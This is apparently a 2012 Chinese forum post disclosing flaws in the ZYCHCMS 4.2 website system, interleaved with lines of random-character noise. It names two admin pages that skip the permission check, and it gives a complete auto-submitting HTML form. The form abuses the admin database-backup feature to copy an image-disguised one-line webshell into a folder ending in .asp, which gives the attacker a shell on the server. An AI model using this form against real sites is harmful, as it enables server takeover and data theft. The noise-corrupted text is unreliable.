2 R! g0 U y7 ~9 b9 K% Z& V: Z
; F; X, d" X V( S" c% u
; `1 x" j7 T0 j
1 E. y& T: }0 i影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
/ k& U( @7 p/ p1 i0 X" m; s5 P" s; _- y' x ①SQL注射漏洞
% y( h$ j' U% o% J 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
: N1 X& `) e. D4 H 漏洞原因:未过滤& e2 {( Q5 Q+ h/ T/ {+ A, S8 ?
漏洞代码:+ s3 S- \" c( |+ z2 F
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。. \. J7 e2 c4 U
修复方法:在文件开头加入代码
8 Q, m7 j* G8 n# M/ L0 e
8 Z, I2 \* P) e+ a- o, @2 W8 R+ L, V9 G* i2 G- D& U0 i/ X
②后台拿WBSHELL
8 o4 D6 V: k* T, |6 h" B( m 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。- h" a; |# \; O
这里在网上找了一个,改了下,将就着用。1 J/ h; z5 e7 ^7 k1 V, O4 |
以下是代码本地提交代码
8 f3 T6 U- l$ r! N6 ]
3 u! f$ [% d# r8 W9 ~# ?) u" w2 S. h2 }# ~' y& a4 v
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>' ]7 \0 `$ R X; e
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
6 c K! l7 K7 O7 v( ]) _7 P <tr>
8 D; F+ \0 C* K0 N5 J <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
" v% ~7 s+ s& w1 ]+ ]. i6 ] </tr>
7 O, U: I) }- G2 ]9 p6 Y, ]4 b <tr>2 X- H" G! i- D! M- [! c
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
) {7 j1 M9 R( \6 T& h0 H) d4 X! L </span>. v% L2 W* d& b6 i! Q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >( G. H! k2 a8 R. u( u1 }, g. a) G
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >% G, }! Z! ]8 I- t1 D$ t
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>9 y: Y0 Z0 e3 w
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d" k, _$ }$ Z- h3 u! p
<div align=”left”>/ @$ r6 S P; h/ A! g% d
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
" Y. \9 x1 G% p" I <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
0 Q* J+ C& @* ^ <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
$ v3 S& J- e. g) [& b z' Q* _% ^( T </div></td>
5 C# p# b2 R ^+ P$ _ </tr>1 p* D R6 i0 S! X6 y K
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>7 _7 q5 I# }# A' q) _. n! W
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
j3 m3 Q; ?4 h2 Q <td class=”td”><div align=”left”>+ u; @5 t( t2 P( }
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />& L6 I/ B! L1 @8 S B/ x9 W7 l9 y) M) g
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
* w. e6 h" u( _ </tr>7 g& ?6 S& V( O, t' J7 `/ k+ X
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
7 l& w% L. H6 F <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>& @# D U# O. ]' g3 Z1 a Q
<td class=”td”><div align=”left”>
. r* T, T& A" d* G/ E$ \ e <input type=”submit” value=”确定备份” class=”btn”
3 ^+ r" e9 k2 `* V: G; A9 o </div></td>' ^: {! H6 V1 G0 B3 K
</tr>
4 L, s9 _6 l& c1 a7 @ </table></td></tr></form>
% Y* ?% i- ~( C& r0 @! c" C) e </table>/ x T4 n# w) w* P4 j1 t
</td>
* y) x7 ~$ @6 d. {. |; y" I </tr>
8 k4 G$ l/ L3 K F: V </table>9 ~: t7 b: e, Q L X" w
<script>
, D& ^2 W2 a9 Y z& U3 X document.all.add.submit();
, Y. z' L! t6 e' @" p9 v k </script>
+ q* Q/ r. v+ b& L % k S; F0 A1 A( E
" t2 s; i( x! C- x0 |3 q" `# O) \% f, U' q. D1 `& U y
2 c, V! e, ^0 U2 Z
3 ?& r, n1 h% d6 {2 K' c$ N: }8 |7 y5 ^" z/ U* Y$ i# V3 ]! V" ~5 u3 w
' q6 v1 [5 b9 \% B
) K4 }# f- m& d& e! l6 ^ K+ |
/ Z& }( o' j6 Z) @7 b/ j. R6 Y* y" |0 Y' ?& a0 z h
|
发表于 2012-9-10 21:09:51
收藏
支持
反对